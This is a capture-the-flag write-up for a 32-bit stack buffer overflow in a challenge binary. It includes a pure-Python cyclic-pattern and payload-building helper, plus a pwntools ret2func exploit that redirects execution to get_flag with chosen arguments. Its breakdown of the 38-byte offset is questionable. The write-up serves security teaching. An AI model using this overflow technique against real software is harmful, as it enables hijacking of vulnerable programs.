
Fued pcc.nccs.qualify 2022

Purpose: Get the flag

We see that no protections are enabled and that the binary is 32-bit x86.

img_1

Start by analyzing the main function. It prints the message, then reads input from the user and stores it in a character buffer of size 100. Further down the program, after some checks, the buffer is passed to the "safe" function.

img_2

In the safe function, the pass argument is copied into a local variable on the stack that is only 30 bytes in size, so we can overflow it.

img_3

After finding the correct padding value (38 bytes, broken down as 30 (buffer size) + 4 (saved ebp) + 4 (param_1)), we start writing the exploit. Going through the function list we find a "get_flag" function, which reads the flag but only prints it if the correct arguments are passed: 0xdeadbeef and 0xcaf3b33f. Whatever the breakdown, the offset should be confirmed empirically (send a cyclic pattern as input and look at the EIP value at the crash in gdb), since the compiler is free to insert alignment between the buffer and the saved ebp.

img_4
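The two steps above (find the offset to the saved EIP, then lay out a ret-to-function frame with arguments) as a stand-alone example. This is added here for illustration and is not code from the original post: it is a pure-Python stand-in for pwntools' cyclic / cyclic_find, a builder for the 32-bit ret2func frame the exploit payload uses, and a check for bytes that would cut the input short. The get_flag address 0x080491f6 and the two argument values are the post's; that the de Bruijn construction matches pwntools', that safe() copies with strcpy-like semantics (so a NUL truncates) and that main() reads one line (so a newline terminates) are assumptions. The "crashed EIP" in the demo is constructed from the pattern itself, not taken from a real crash.

```python
import itertools
import struct


def de_bruijn(alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """Yield a de Bruijn sequence B(k, n): every n-byte window occurs once.

    Standard Lyndon-word construction; assumed to be the same one pwntools'
    cyclic() uses, so the offsets found here should agree with cyclic_find.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for c in a[1:p + 1]:
                    yield alphabet[c]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern: the input that crashes the target."""
    return bytes(itertools.islice(de_bruijn(n=n), length))


def cyclic_find(value, n=4):
    """Offset of the n-byte window `value`, given as bytes or as the integer
    EIP gdb shows at the crash (packed little-endian, as on x86).
    Returns -1 if the window is not in the pattern."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    if len(value) != n:
        raise ValueError("expected exactly %d bytes" % n)
    window = b""
    for i, byte in enumerate(de_bruijn(n=n)):
        window = (window + bytes([byte]))[-n:]
        if window == value:
            return i - n + 1
    return -1


def ret2func_payload(offset, target, args, fake_ret=0x41414141):
    """Build the 32-bit x86 ret-to-function frame.

    After `offset` bytes the saved EIP is overwritten with `target`. When the
    vulnerable function executes `ret`, ESP points just past `target`, so the
    callee sees `fake_ret` as its return address at [ESP] and the arguments at
    [ESP+4], [ESP+8], ... exactly as if it had been called normally.
    """
    payload = b"A" * offset
    payload += struct.pack("<I", target)
    payload += struct.pack("<I", fake_ret)   # junk; the process may crash once target returns
    for arg in args:
        payload += struct.pack("<I", arg & 0xFFFFFFFF)
    return payload


def bad_chars(payload, bad=b"\x00\n"):
    """Bytes in `payload` that would cut the input short before the overflow.
    Assumed: NUL stops the strcpy-style copy in safe(), newline ends the line
    read by main(). Returns the offending byte values, sorted."""
    return sorted(set(payload) & set(bad))


if __name__ == "__main__":
    # 1. Send cyclic(100) instead of the key and read EIP at the crash in gdb.
    #    The value below is constructed from the pattern, standing in for gdb's.
    pattern = cyclic(100)
    crashed_eip = struct.unpack("<I", pattern[38:42])[0]
    offset = cyclic_find(crashed_eip)
    print("offset to saved EIP:", offset)   # 38, as in the post

    # 2. Reuse the offset for the post's payload (0x080491f6 = get_flag).
    payload = ret2func_payload(offset, 0x080491f6, [0xDEADBEEF, 0xCAF3B33F])
    print("payload:", payload.hex(), "bad bytes:", bad_chars(payload))
```

Run it as a script for the demo, or import the helpers into an exploit. Note that cyclic_find only searches linear windows of the pattern; the wrap-around windows at the very end of the 26^4-byte sequence are never sent in practice, so that does not matter.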

Now that the complicated things are out of the way, my favorite part: crafting the exploit.

```python
#!/usr/bin/python3
from pwn import *
import sys

# Usage: ./exploit.py              -> run ./fued locally
#        ./exploit.py GDB          -> run under gdb with the script below
#        ./exploit.py REMOTE host port
def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)


gdbscript = '''
continue
'''

exe = './fued'
elf = context.binary = ELF(exe, checksec=False)

io = start()

offset = 38              # bytes from the start of the 30-byte buffer to the saved EIP
get_flag = 0x080491f6    # address of get_flag from the function list (no PIE, so fixed)

# ret2func: overwrite the saved EIP with get_flag. The 4 bytes after it become
# get_flag's return address (junk), followed by its two arguments.
payload  = b"A" * offset
payload += p32(get_flag)
payload += b"A" * 4          # fake return address for get_flag
payload += p32(0xdeadbeef)   # first argument
payload += p32(0xcaf3b33f)   # second argument

io.sendlineafter(b"Enter the key that you received when registering:", payload)

io.interactive()
```


"Boom". Got the flag.

img_5

This post is licensed under CC BY 4.0 by the author.